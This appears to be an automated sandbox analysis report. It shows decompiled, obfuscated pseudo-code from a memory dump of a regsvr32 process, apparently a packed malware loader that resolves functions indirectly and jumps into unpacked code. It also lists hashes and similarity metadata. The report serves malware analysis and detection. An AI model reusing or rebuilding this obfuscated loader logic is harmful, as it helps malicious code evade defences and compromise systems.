                                          				intOrPtr _t165;
                                          				signed int _t166;
                                          				signed int _t168;
                                          				signed int _t173;
                                          				intOrPtr _t175;
                                          				signed int _t178;
                                          				signed int _t179;
                                          				signed int _t180;
                                          				signed int _t182;
                                          				intOrPtr _t185;
                                          				intOrPtr _t188;
                                          				signed int _t191;
                                          				signed int _t193;
                                          				signed int _t195;
                                          				signed int _t196;
                                          				void* _t198;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				signed int _t210;
                                          				signed int _t222;
                                          				signed int _t231;
                                          				signed int _t234;
                                          				signed int _t245;
                                          				signed int _t248;
                                          				signed int _t251;
                                          				signed int _t258;
                                          				intOrPtr* _t263;
                                          				signed int* _t264;
                                          				signed int* _t265;
                                          				signed int* _t266;
                                          
                                          				_t248 = __esi;
                                          				_t245 = __edi;
                                          				_t231 = __edx;
                                          				_t201 = __ecx;
                                          				_t198 = __ebx;
                                          				_t163 = __eax;
                                          				if( *(__ebx + 0x43542a) == 0) {
                                          					_push(__eax);
                                          					_push(__ecx);
                                          					_push( *((intOrPtr*)(__ebx + 0x435920)));
                                          					_push( *((intOrPtr*)(__ebx + 0x4355cd)));
                                          					_push( *((intOrPtr*)(__ebx + 0x4357aa)));
                                          					_push(0x23);
                                          					_push( *((intOrPtr*)(__ebx + 0x435327)));
                                          					_push(2);
                                          					_t196 =  *((intOrPtr*)(__ebx + 0x4410a0))();
                                          					_v12 = __ecx;
                                          					 *(__ebx + 0x43542a) =  *(__ebx + 0x43542a) & 0x00000000;
                                          					 *(__ebx + 0x43542a) =  *(__ebx + 0x43542a) | __ecx & 0x00000000 | _t196;
                                          					 *_t13 = 0;
                                          					_t201 = 0 ^ _v12;
                                          					_t163 = (_t196 & 0x00000000) +  *_t263;
                                          					_t263 = _t263 - 0xfffffffc;
                                          				}
                                          				_push(_t201);
                                          				if( *(_t198 + 0x43547a) == 0) {
                                          					_t195 =  *((intOrPtr*)(_t198 + 0x4410a0))( *((intOrPtr*)(_t198 + 0x435860)), 0xffffffff,  *((intOrPtr*)(_t198 + 0x4353a2)),  *((intOrPtr*)(_t198 + 0x435466)),  *((intOrPtr*)(_t198 + 0x435990)),  *((intOrPtr*)(_t198 + 0x4354de)),  *((intOrPtr*)(_t198 + 0x435192)));
                                          					_v12 = _t245;
                                          					 *(_t198 + 0x43547a) = 0 ^ _t195;
                                          					_t245 = _v12;
                                          				}
                                          				_push(_t198 + 0x43533b);
                                          				_t165 = _t198 + 0x4359d1;
                                          				if( *(_t198 + 0x43512e) == 0) {
                                          					_t193 =  *((intOrPtr*)(_t198 + 0x441070))( *((intOrPtr*)(_t198 + 0x435679)), _t165);
                                          					_v12 = _t248;
                                          					 *(_t198 + 0x43512e) =  *(_t198 + 0x43512e) & 0x00000000;
                                          					 *(_t198 + 0x43512e) =  *(_t198 + 0x43512e) ^ (_t248 & 0x00000000 | _t193);
                                          					_t248 = _v12;
                                          					_t165 =  *_t263;
                                          					_t263 = _t263 - 0xfffffffc;
                                          				}
                                          				_t166 =  *((intOrPtr*)(_t198 + 0x441044))(_t165);
                                          				if( *(_t198 + 0x435890) == 0) {
                                          					_t191 =  *((intOrPtr*)(_t198 + 0x44105c))();
                                          					_v12 = _t231;
                                          					 *(_t198 + 0x435890) =  *(_t198 + 0x435890) & 0x00000000;
                                          					 *(_t198 + 0x435890) =  *(_t198 + 0x435890) | _t231 ^ _v12 ^ _t191;
                                          					_t231 = _v12;
                                          					 *_t47 = _t166;
                                          					_t166 = _v12;
                                          				}
                                          				_v12 = _t201;
                                          				 *(_t198 + 0x43529c) =  *(_t198 + 0x43529c) & 0x00000000;
                                          				 *(_t198 + 0x43529c) =  *(_t198 + 0x43529c) ^ (_t201 & 0x00000000 | _t166);
                                          				_t264 = _t263 - 0xfffffffc;
                                          				_t168 = 0 ^  *_t264;
                                          				_t265 = _t264 - 0xfffffffc;
                                          				_push( *_t263);
                                          				if( *((intOrPtr*)(_t198 + 0x43526c)) == 0) {
                                          					 *_t59 =  *((intOrPtr*)(_t198 + 0x4410a8))( *((intOrPtr*)(_t198 + 0x43561d)),  *((intOrPtr*)(_t198 + 0x4356c5)), _t168);
                                          					_push(_v12);
                                          					_pop( *_t61);
                                          					_t168 =  *_t265;
                                          					_t265 =  &(_t265[1]);
                                          				}
                                          				if( *(_t198 + 0x4350a4) == 0) {
                                          					_push(_t168);
                                          					_push( *((intOrPtr*)(_t198 + 0x43581d)));
                                          					if( *((intOrPtr*)(_t198 + 0x435631)) == 0) {
                                          						_t188 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x4350f2);
                                          						_v12 = _t231;
                                          						 *((intOrPtr*)(_t198 + 0x435631)) = _t188;
                                          						_t231 = _v12;
                                          					}
                                          					_t182 =  *((intOrPtr*)(_t198 + 0x4410a4))();
                                          					if( *((intOrPtr*)(_t198 + 0x435496)) == 0) {
                                          						_t185 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x43532b, _t182);
                                          						 *_t265 = _t258;
                                          						 *((intOrPtr*)(_t198 + 0x435496)) = _t185;
                                          						_t258 = 0;
                                          						_t182 =  *_t265;
                                          						_t265 =  &(_t265[1]);
                                          					}
                                          					_v12 = _t231;
                                          					 *(_t198 + 0x4350a4) =  *(_t198 + 0x4350a4) & 0x00000000;
                                          					 *(_t198 + 0x4350a4) =  *(_t198 + 0x4350a4) | _t231 - _v12 | _t182;
                                          					_t231 = _v12;
                                          					_t168 =  *_t265;
                                          					_t265 =  &(_t265[1]);
                                          				}
                                          				_v12 = _t231;
                                          				_t207 = 0 ^ _a4;
                                          				_t234 = _v12;
                                          				_v12 = _t248;
                                          				_v8 = _v8 & 0x00000000;
                                          				_v8 = _v8 ^ (_t248 & 0x00000000 | _t207);
                                          				_t251 = _v12;
                                          				if( *(_t198 + 0x43515e) == 0) {
                                          					_t180 =  *((intOrPtr*)(_t198 + 0x4410a4))( *((intOrPtr*)(_t198 + 0x4353be)), _t207, _t168);
                                          					 *_t265 = _t234;
                                          					 *(_t198 + 0x43515e) = _t180;
                                          					_t234 = 0;
                                          					_t207 = _t207 & 0x00000000 |  *_t265;
                                          					_t265 =  &(_t265[1]);
                                          					_pop( *_t95);
                                          					_t168 = _t180 & 0x00000000 ^ _v12;
                                          				}
                                          				do {
                                          					_t209 = _t207 + _a8 ^ _a4;
                                          					_t198 = _t198;
                                          					if( *((intOrPtr*)(_t198 + 0x4354ce)) == 0) {
                                          						if( *(_t198 + 0x43552c) == 0) {
                                          							_t178 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x43586c, _t209, _t168);
                                          							 *_t265 = _t258;
                                          							 *(_t198 + 0x43552c) = 0 ^ _t178;
                                          							_t258 = 0;
                                          							_t209 = _t209 & 0x00000000 |  *_t265;
                                          							_t265 =  &(_t265[1]);
                                          							_pop( *_t104);
                                          							_t168 = _v12;
                                          						}
                                          						 *_t108 =  *((intOrPtr*)(_t198 + 0x44106c))(_t198 + 0x435782, _t209, _t168);
                                          						_push(_v12);
                                          						_pop( *_t110);
                                          						_t209 = 0 ^  *_t265;
                                          						_t266 =  &(_t265[1]);
                                          						_t168 =  *_t266;
                                          						_t265 = _t266 - 0xfffffffc;
                                          					}
                                          					if(_t209 > _a12) {
                                          						if( *((intOrPtr*)(_t198 + 0x4351df)) == 0) {
                                          							_t175 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x435382, _t209, _t168);
                                          							 *_t265 = _t209;
                                          							 *((intOrPtr*)(_t198 + 0x4351df)) = _t175;
                                          							_t222 = 0;
                                          							_t209 = (_t222 & 0x00000000) +  *_t265;
                                          							_t265 =  &(_t265[1]);
                                          							_pop( *_t116);
                                          							_t168 = _v12;
                                          						}
                                          						_a16 = _a16 + _t168;
                                          					}
                                          					_t210 = _t209 + _a16;
                                          					if(_t210 > 0) {
                                          						if( *(_t198 + 0x4350e0) == 0) {
                                          							_t173 =  *((intOrPtr*)(_t198 + 0x4410a8))(0, 1);
                                          							_v12 = _t251;
                                          							 *(_t198 + 0x4350e0) =  *(_t198 + 0x4350e0) & 0x00000000;
                                          							 *(_t198 + 0x4350e0) =  *(_t198 + 0x4350e0) | _t251 - _v12 | _t173;
                                          							_t251 = _v12;
                                          						}
                                          						_t168 =  *((intOrPtr*)(_t198 + 0x441040))();
                                          						_a12 = _a12 & 0x00000000;
                                          						_a12 = _a12 | _t251 & 0x00000000 | _t168;
                                          						_t251 = _t251;
                                          						_t210 = _t210 + _a4;
                                          						if( *(_t198 + 0x43560d) == 0) {
                                          							_t168 =  *((intOrPtr*)(_t198 + 0x4410a4))(1, _t210);
                                          							_v12 = _t210;
                                          							 *(_t198 + 0x43560d) =  *(_t198 + 0x43560d) & 0x00000000;
                                          							 *(_t198 + 0x43560d) =  *(_t198 + 0x43560d) ^ (_t210 & 0x00000000 | _t168);
                                          							_t210 =  *_t265;
                                          							_t265 = _t265 - 0xfffffffc;
                                          						}
                                          						if(_t210 > _a8) {
                                          							_push(_a8);
                                          							if( *(_t198 + 0x43519f) == 0) {
                                          								_t179 =  *((intOrPtr*)(_t198 + 0x441060))();
                                          								 *(_t198 + 0x43519f) =  *(_t198 + 0x43519f) & 0x00000000;
                                          								 *(_t198 + 0x43519f) =  *(_t198 + 0x43519f) | _t234 & 0x00000000 ^ _t179;
                                          								_t234 = _t234;
                                          								 *_t152 = _t210;
                                          								_t210 = _t210 & 0x00000000 ^ _v12;
                                          							}
                                          							_t168 = E00194162(_t198, _t210, _t234, _t245, _t251);
                                          							if( *((intOrPtr*)(_t198 + 0x435000)) == 0) {
                                          								_t168 =  *((intOrPtr*)(_t198 + 0x441060))(_t210);
                                          								 *_t156 = _t168;
                                          								_push(_v12);
                                          								_pop( *_t158);
                                          								_t210 = 0 ^  *_t265;
                                          								_t265 =  &(_t265[1]);
                                          							}
                                          						}
                                          					}
                                          					_t207 = (_t210 & _a16) + _a4;
                                          					_t161 =  &_v8;
                                          					 *_t161 = _v8 - 1;
                                          				} while ( *_t161 != 0);
                                          				return 0;
                                          			}




































                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f9300375a47c9c0b9ce0fa8dd9576d32fcc0e3f0f2c61a7eb1a98b77313a69a
                                          • Instruction ID: f54421ab7f1142172477650bffaf17ba30d8036149207d13e6a1e53222052090
                                          • Opcode Fuzzy Hash: 5f9300375a47c9c0b9ce0fa8dd9576d32fcc0e3f0f2c61a7eb1a98b77313a69a
                                          • Instruction Fuzzy Hash: 98D16072804504EFFF08DFA4C989BA97BB1FF24321F0851A9ED0D9E189D77456A0CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			_entry_() {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				void* _t159;
                                          				signed int _t160;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t166;
                                          				signed int _t168;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				signed int _t180;
                                          				signed int _t182;
                                          				intOrPtr _t183;
                                          				signed int _t185;
                                          				intOrPtr _t186;
                                          				void* _t187;
                                          				signed int _t188;
                                          				int _t190;
                                          				signed int _t192;
                                          				signed int _t205;
                                          				signed int _t215;
                                          				signed int _t217;
                                          				void* _t220;
                                          				signed int _t222;
                                          				signed int _t228;
                                          				signed int _t231;
                                          				signed int _t235;
                                          				void* _t238;
                                          				signed int _t251;
                                          				signed int _t257;
                                          				signed int* _t258;
                                          				signed int* _t259;
                                          
                                          				_push(0);
                                          				_t251 = _t257;
                                          				_t258 = _t257 + 0xfffffff8;
                                          				_t160 = E0019463B(_t159, _t187, _t188, _t215);
                                          				if(_t187 == _t160) {
                                          					L25:
                                          					_v12 = _t228;
                                          					_t217 = _t215 & 0x00000000 | _t228 - _v12 | _t160;
                                          					_t231 = _v12;
                                          					if( *(_t187 + 0x4358e0) == 0) {
                                          						_t171 =  *((intOrPtr*)(_t187 + 0x44105c))();
                                          						 *_t258 = _t188;
                                          						 *(_t187 + 0x4358e0) = 0 ^ _t171;
                                          						_t188 = 0;
                                          					}
                                          					_v16 = _t231;
                                          					 *(_t187 + 0x43596c) =  *(_t187 + 0x43596c) & 0x00000000;
                                          					 *(_t187 + 0x43596c) =  *(_t187 + 0x43596c) ^ (_t231 & 0x00000000 | _t217);
                                          					if(_t187 > 0) {
                                          						 *(_t187 + 0x4350b0) =  *(_t187 + 0x4350b0) + _t187;
                                          						if( *((intOrPtr*)(_t187 + 0x435152)) == 0) {
                                          							 *_t109 =  *((intOrPtr*)(_t187 + 0x4410a0))( *((intOrPtr*)(_t187 + 0x4355c9)),  *((intOrPtr*)(_t187 + 0x4357ba)),  *((intOrPtr*)(_t187 + 0x435048)), 0x62,  *((intOrPtr*)(_t187 + 0x43567d)),  *((intOrPtr*)(_t187 + 0x43531b)), 4);
                                          							_push(_v12);
                                          							_pop( *_t111);
                                          						}
                                          						 *((intOrPtr*)(_t187 + 0x435288)) =  *((intOrPtr*)(_t187 + 0x435288)) + _t187;
                                          					}
                                          					_v12 = _t217;
                                          					_t235 = 0 ^  *(_t187 + 0x4350b0);
                                          					_t220 = _v12;
                                          					if( *(_t187 + 0x4356dd) == 0) {
                                          						_t169 =  *((intOrPtr*)(_t187 + 0x441058))();
                                          						_v16 = _t188;
                                          						 *(_t187 + 0x4356dd) =  *(_t187 + 0x4356dd) & 0x00000000;
                                          						 *(_t187 + 0x4356dd) =  *(_t187 + 0x4356dd) | _t188 & 0x00000000 | _t169;
                                          						_t188 = _v16;
                                          					}
                                          					_t190 = _t188 & 0x00000000 ^ (_t235 & 0x00000000 |  *(_t187 + 0x435462));
                                          					_t238 = _t235;
                                          					asm("cld");
                                          					_t161 = memcpy(_t220, _t238, _t190);
                                          					_t259 =  &(_t258[3]);
                                          					_t222 = _t238 + _t190 + _t190;
                                          					 *_t259 = 0xfffff;
                                          					_t192 = _t205;
                                          					if( *(_t187 + 0x435621) == 0) {
                                          						_t161 =  *((intOrPtr*)(_t187 + 0x441060))(_t192);
                                          						 *_t259 = _t238;
                                          						 *(_t187 + 0x435621) = 0 ^ _t161;
                                          						_t238 = 0;
                                          						_t192 =  *_t259;
                                          						_t259 =  &(_t259[1]);
                                          					}
                                          					_v16 = _t222;
                                          					_t163 = _t161 & 0x00000000 ^ (_t222 ^ _v16 |  *(_t187 + 0x43596c));
                                          					if( *(_t187 + 0x435054) == 0) {
                                          						_t168 =  *((intOrPtr*)(_t187 + 0x441058))(_t163);
                                          						_v12 = _t238;
                                          						 *(_t187 + 0x435054) = 0 ^ _t168;
                                          						_t192 =  *_t259;
                                          						_t259 =  &(_t259[1]);
                                          						 *_t138 = _t192;
                                          						_t163 = _v12;
                                          					}
                                          					_push(0x401424);
                                          					if( *(_t187 + 0x43520f) == 0) {
                                          						_t166 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x4357c6, _t192, _t163);
                                          						_v12 = _t205;
                                          						 *(_t187 + 0x43520f) = 0 ^ _t166;
                                          						_t192 =  *_t259;
                                          						_pop( *_t146);
                                          						_t163 = _t166 & 0x00000000 ^ _v16;
                                          					}
                                          					_pop( *_t148);
                                          					 *(_t187 + 0x4351a7) =  *(_t187 + 0x4351a7) & _t192;
                                          					 *(_t187 + 0x4351a7) =  *(_t187 + 0x4351a7) + _t163;
                                          					if( *((intOrPtr*)(_t187 + 0x4357b6)) == 0) {
                                          						 *_t155 =  *((intOrPtr*)(_t187 + 0x44105c))();
                                          						_push(_v12);
                                          						_pop( *_t157);
                                          					}
                                          					goto ( *(_t187 + 0x4351a7));
                                          				}
                                          				asm("pushad");
                                          				_t215 = _t215 + _t187;
                                          				_t188 = _t188 + 1 + _t160;
                                          				_push(_t160);
                                          				_push(_t188);
                                          				_push(0x125);
                                          				if( *(_t187 + 0x4353fe) == 0) {
                                          					_t160 =  *((intOrPtr*)(_t187 + 0x4410a0))( *((intOrPtr*)(_t187 + 0x4350b8)),  *((intOrPtr*)(_t187 + 0x43537e)),  *((intOrPtr*)(_t187 + 0x43598c)), 0x3b, 0x77, 0x10b, 0x2000);
                                          					 *(_t187 + 0x4353fe) =  *(_t187 + 0x4353fe) & 0x00000000;
                                          					 *(_t187 + 0x4353fe) =  *(_t187 + 0x4353fe) ^ _t251 -  *_t258 ^ _t160;
                                          					_t251 = _t251;
                                          				}
                                          				if( *(_t187 + 0x43545e) == 0) {
                                          					if( *((intOrPtr*)(_t187 + 0x435954)) == 0) {
                                          						_t186 =  *((intOrPtr*)(_t187 + 0x441058))();
                                          						_v12 = _t228;
                                          						 *((intOrPtr*)(_t187 + 0x435954)) = _t186;
                                          						_t228 = _v12;
                                          					}
                                          					_push( *((intOrPtr*)(_t187 + 0x4354f5)));
                                          					_push(0x8e);
                                          					_push( *((intOrPtr*)(_t187 + 0x435988)));
                                          					if( *(_t187 + 0x435849) == 0) {
                                          						_t185 =  *((intOrPtr*)(_t187 + 0x44106c))(_t187 + 0x435908);
                                          						 *(_t187 + 0x435849) =  *(_t187 + 0x435849) & 0x00000000;
                                          						 *(_t187 + 0x435849) =  *(_t187 + 0x435849) | _t205 -  *_t258 ^ _t185;
                                          						_t205 = _t205;
                                          					}
                                          					_push(0x4b);
                                          					_push( *((intOrPtr*)(_t187 + 0x435a11)));
                                          					if( *((intOrPtr*)(_t187 + 0x435342)) == 0) {
                                          						_t183 =  *((intOrPtr*)(_t187 + 0x441058))();
                                          						 *_t258 = _t188;
                                          						 *((intOrPtr*)(_t187 + 0x435342)) = _t183;
                                          						_t188 = 0;
                                          					}
                                          					_t160 =  *((intOrPtr*)(_t187 + 0x4410a0))(0,  *((intOrPtr*)(_t187 + 0x4353f2)));
                                          					_v12 = _t188;
                                          					 *(_t187 + 0x43545e) =  *(_t187 + 0x43545e) & 0x00000000;
                                          					 *(_t187 + 0x43545e) =  *(_t187 + 0x43545e) | _t188 ^ _v12 ^ _t160;
                                          					_t188 = _v12;
                                          					if( *(_t187 + 0x4358e8) == 0) {
                                          						_t160 =  *((intOrPtr*)(_t187 + 0x441060))();
                                          						 *_t258 = _t205;
                                          						 *(_t187 + 0x4358e8) = 0 ^ _t160;
                                          						_t205 = 0;
                                          					}
                                          				}
                                          				_push(0x25);
                                          				if( *(_t187 + 0x4354d6) == 0) {
                                          					if( *(_t187 + 0x435116) == 0) {
                                          						_t182 =  *((intOrPtr*)(_t187 + 0x44105c))();
                                          						_v16 = _t215;
                                          						 *(_t187 + 0x435116) = 0 ^ _t182;
                                          						_t215 = _v16;
                                          					}
                                          					_t160 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x4352db);
                                          					if( *(_t187 + 0x435372) == 0) {
                                          						_t180 =  *((intOrPtr*)(_t187 + 0x4410a4))( *((intOrPtr*)(_t187 + 0x4350e4)), _t160);
                                          						_v16 = _t228;
                                          						 *(_t187 + 0x435372) =  *(_t187 + 0x435372) & 0x00000000;
                                          						 *(_t187 + 0x435372) =  *(_t187 + 0x435372) | _t228 & 0x00000000 | _t180;
                                          						_t228 = _v16;
                                          						_t160 = (_t180 & 0x00000000) +  *_t258;
                                          						_t258 = _t258 - 0xfffffffc;
                                          					}
                                          					_v16 = _t228;
                                          					 *(_t187 + 0x4354d6) =  *(_t187 + 0x4354d6) & 0x00000000;
                                          					 *(_t187 + 0x4354d6) =  *(_t187 + 0x4354d6) ^ (_t228 ^ _v16 | _t160);
                                          					_t228 = _v16;
                                          				}
                                          				E00191827(_t160, _t187, _t188, _t205, _t215, _t228);
                                          				_push(0x40);
                                          				if( *(_t187 + 0x43500c) == 0) {
                                          					_t178 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x435786);
                                          					_push(_t251);
                                          					 *(_t187 + 0x43500c) =  *(_t187 + 0x43500c) & 0x00000000;
                                          					 *(_t187 + 0x43500c) =  *(_t187 + 0x43500c) | _t251 & 0x00000000 ^ _t178;
                                          				}
                                          				_push(0x1000);
                                          				if( *(_t187 + 0x43521b) == 0) {
                                          					_t173 =  *((intOrPtr*)(_t187 + 0x441058))();
                                          					if( *((intOrPtr*)(_t187 + 0x4355e1)) == 0) {
                                          						 *_t77 =  *((intOrPtr*)(_t187 + 0x441068))(_t187 + 0x43565d, _t173);
                                          						_push(_v16);
                                          						_pop( *_t79);
                                          						_t173 = 0 ^  *_t258;
                                          						_t258 = _t258 - 0xfffffffc;
                                          					}
                                          					_v16 = _t205;
                                          					 *(_t187 + 0x43521b) =  *(_t187 + 0x43521b) & 0x00000000;
                                          					 *(_t187 + 0x43521b) =  *(_t187 + 0x43521b) ^ (_t205 & 0x00000000 | _t173);
                                          					_t205 = _v16;
                                          				}
                                          				_t160 =  *((intOrPtr*)(_t187 + 0x441038))(0,  *(_t187 + 0x435462));
                                          				goto L25;
                                          			}






































                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c6dffc6ab0dc623df7d104188c7a479368cdd60f933b7d7c9772a49a395397e
                                          • Instruction ID: 6cb297c42e37991e85d7d881fbb4454e69638b74e4db16b59bd34df6e14af8fc
                                          • Opcode Fuzzy Hash: 9c6dffc6ab0dc623df7d104188c7a479368cdd60f933b7d7c9772a49a395397e
                                          • Instruction Fuzzy Hash: 07D12872804A04EFFF14DFA0C9897597BB1FF24321F1854A9ED0DAE19AC77416A4CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00194162(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4) {
                                          				signed int _v8;
                                          				signed int _t126;
                                          				signed int _t132;
                                          				signed int _t134;
                                          				signed int _t136;
                                          				signed int _t141;
                                          				signed int _t143;
                                          				signed int _t146;
                                          				signed int _t147;
                                          				signed int _t149;
                                          				signed int _t153;
                                          				signed int _t154;
                                          				signed int _t157;
                                          				signed int _t159;
                                          				void* _t160;
                                          				signed int _t164;
                                          				signed int _t167;
                                          				signed int _t170;
                                          				signed int _t171;
                                          				signed int _t173;
                                          				signed int _t174;
                                          				void* _t196;
                                          				signed int _t199;
                                          				signed int _t202;
                                          				void* _t207;
                                          				void* _t210;
                                          				signed int _t211;
                                          				signed int* _t217;
                                          				signed int* _t219;
                                          				signed int* _t220;
                                          
                                          				_t207 = __esi;
                                          				_t199 = __edi;
                                          				_t193 = __edx;
                                          				_t160 = __ebx;
                                          				_push(__ebx + 0x4353ea);
                                          				_t126 =  *((intOrPtr*)(__ebx + 0x441044))();
                                          				_push(__ecx);
                                          				 *(__ebx + 0x4351e7) =  *(__ebx + 0x4351e7) & 0x00000000;
                                          				 *(__ebx + 0x4351e7) =  *(__ebx + 0x4351e7) ^ __ecx ^  *_t217 ^ _t126;
                                          				_pop(_t164);
                                          				_push(__ebx + 0x4356fd);
                                          				if( *(__ebx + 0x4355d1) == 0) {
                                          					_push( *((intOrPtr*)(__ebx + 0x4351db)));
                                          					_push( *((intOrPtr*)(__ebx + 0x4355d9)));
                                          					_t159 =  *((intOrPtr*)(__ebx + 0x4410a8))();
                                          					_v8 = __edx;
                                          					 *(__ebx + 0x4355d1) =  *(__ebx + 0x4355d1) & 0x00000000;
                                          					 *(__ebx + 0x4355d1) =  *(__ebx + 0x4355d1) | __edx - _v8 | _t159;
                                          					_t193 = _v8;
                                          				}
                                          				_t132 =  *((intOrPtr*)(_t160 + 0x441044))(_t160 + 0x43511e, _t160 + 0x43566c,  *((intOrPtr*)(_t160 + 0x441044))(_t160 + 0x435918));
                                          				 *_t217 = _t199;
                                          				 *(_t160 + 0x43554d) = _t132;
                                          				_t202 = 0;
                                          				_pop( *_t26);
                                          				_t134 = _t132 & 0x00000000 ^ _v8;
                                          				_v8 = _t164;
                                          				 *(_t160 + 0x4352ef) = _t134;
                                          				_t167 = _v8;
                                          				_push(_t207);
                                          				_v8 = _t167;
                                          				_t136 = _t134 & 0x00000000 | _t167 & 0x00000000 ^ _a4;
                                          				_t170 = _v8;
                                          				if( *(_t160 + 0x43541e) == 0) {
                                          					_t157 =  *((intOrPtr*)(_t160 + 0x44106c))(_t160 + 0x4355e5, _t136);
                                          					 *_t217 = _t211;
                                          					 *(_t160 + 0x43541e) = 0 ^ _t157;
                                          					_t211 = 0;
                                          					_pop( *_t38);
                                          					_t136 = _v8;
                                          				}
                                          				_t171 = _t170 ^ _t170;
                                          				_t196 = _t193;
                                          				if( *((intOrPtr*)(_t160 + 0x4351a3)) == 0) {
                                          					if( *(_t160 + 0x4357ea) == 0) {
                                          						_t154 =  *((intOrPtr*)(_t160 + 0x4410a0))( *((intOrPtr*)(_t160 + 0x43591c)),  *((intOrPtr*)(_t160 + 0x4355a5)),  *((intOrPtr*)(_t160 + 0x4356d5)),  *((intOrPtr*)(_t160 + 0x435050)),  *((intOrPtr*)(_t160 + 0x43513e)),  *((intOrPtr*)(_t160 + 0x435589)), _t171, _t136);
                                          						_v8 = _t171;
                                          						 *(_t160 + 0x4357ea) =  *(_t160 + 0x4357ea) & 0x00000000;
                                          						 *(_t160 + 0x4357ea) =  *(_t160 + 0x4357ea) | _t171 - _v8 | _t154;
                                          						 *_t56 = 0;
                                          						_t171 = _v8;
                                          						_t136 = 0 ^  *_t217;
                                          						_t217 = _t217 - 0xfffffffc;
                                          					}
                                          					 *_t59 =  *((intOrPtr*)(_t160 + 0x441060))(_t171, _t136);
                                          					_push(_v8);
                                          					_pop( *_t61);
                                          					if( *(_t160 + 0x435752) == 0) {
                                          						_t153 =  *((intOrPtr*)(_t160 + 0x4410a0))( *((intOrPtr*)(_t160 + 0x435396)),  *((intOrPtr*)(_t160 + 0x43512a)),  *((intOrPtr*)(_t160 + 0x435034)),  *((intOrPtr*)(_t160 + 0x435825)),  *((intOrPtr*)(_t160 + 0x435094)), 0x4c,  *((intOrPtr*)(_t160 + 0x4352eb)));
                                          						_v8 = _t202;
                                          						 *(_t160 + 0x435752) =  *(_t160 + 0x435752) & 0x00000000;
                                          						 *(_t160 + 0x435752) =  *(_t160 + 0x435752) | _t202 & 0x00000000 ^ _t153;
                                          						_t202 = _v8;
                                          					}
                                          					_pop( *_t76);
                                          					_t171 = _v8;
                                          					_t136 = 0 ^  *_t217;
                                          					_t217 = _t217 - 0xfffffffc;
                                          				}
                                          				if(_t136 > 0) {
                                          					if( *(_t160 + 0x43535a) == 0) {
                                          						_t149 =  *((intOrPtr*)(_t160 + 0x441058))(_t171, _t136);
                                          						_v8 = _t171;
                                          						 *(_t160 + 0x43535a) = 0 ^ _t149;
                                          						_t171 =  *_t217;
                                          						_t220 = _t217 - 0xfffffffc;
                                          						_t136 = _t149 & 0x00000000 ^  *_t220;
                                          						_t217 = _t220 - 0xfffffffc;
                                          					}
                                          					if( *(_t160 + 0x43597c) == 0) {
                                          						if( *(_t160 + 0x43534e) == 0) {
                                          							_t147 =  *((intOrPtr*)(_t160 + 0x4410a4))( *((intOrPtr*)(_t160 + 0x4359e5)), _t171, _t136);
                                          							 *(_t160 + 0x43534e) =  *(_t160 + 0x43534e) & 0x00000000;
                                          							 *(_t160 + 0x43534e) =  *(_t160 + 0x43534e) | _t211 & 0x00000000 | _t147;
                                          							 *_t91 = _t211;
                                          							_t171 = 0 ^ _v8;
                                          							_t136 = 0 ^  *_t217;
                                          							_t217 = _t217 - 0xfffffffc;
                                          						}
                                          						_push(_t136);
                                          						_push(_t171);
                                          						if( *(_t160 + 0x435260) == 0) {
                                          							_t146 =  *((intOrPtr*)(_t160 + 0x441064))(_t160 + 0x435102);
                                          							_v8 = _t171;
                                          							 *(_t160 + 0x435260) =  *(_t160 + 0x435260) & 0x00000000;
                                          							 *(_t160 + 0x435260) =  *(_t160 + 0x435260) ^ (_t171 ^ _v8 | _t146);
                                          						}
                                          						_t143 =  *((intOrPtr*)(_t160 + 0x441060))();
                                          						_v8 = _t202;
                                          						 *(_t160 + 0x43597c) =  *(_t160 + 0x43597c) & 0x00000000;
                                          						 *(_t160 + 0x43597c) =  *(_t160 + 0x43597c) | _t202 & 0x00000000 ^ _t143;
                                          						_t202 = _v8;
                                          						_pop( *_t110);
                                          						_t171 = _v8;
                                          						_pop( *_t112);
                                          						_t136 = (_t143 & 0x00000000) + _v8;
                                          					}
                                          					_t173 = _t171 + _t136 + _t136;
                                          					if( *(_t160 + 0x435a1d) == 0) {
                                          						_t141 =  *((intOrPtr*)(_t160 + 0x441054))(_t160 + 0x4356b1, _t173, _t136);
                                          						_v8 = _t173;
                                          						 *(_t160 + 0x435a1d) = _t141;
                                          						_t173 =  *_t217;
                                          						_t219 =  &(_t217[1]);
                                          						_t136 = (_t141 & 0x00000000) +  *_t219;
                                          						_t217 =  &(_t219[1]);
                                          					}
                                          					 *_t217 =  *_t217 ^ _t173;
                                          					_t174 = _t160;
                                          					_t210 = _t207 + _t174;
                                          					if(_t174 > _t136) {
                                          						_v8 = _t174;
                                          						_t136 = E00194162(_t160, _v8, _t196, _t202, _t210, (_t136 & 0x00000000 ^ _t174 - _v8 ^ _a4) - 1);
                                          					}
                                          				}
                                          				_push(_t136);
                                          				 *_t217 =  *_t217 ^ _t136;
                                          				return _t136;
                                          			}


































                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
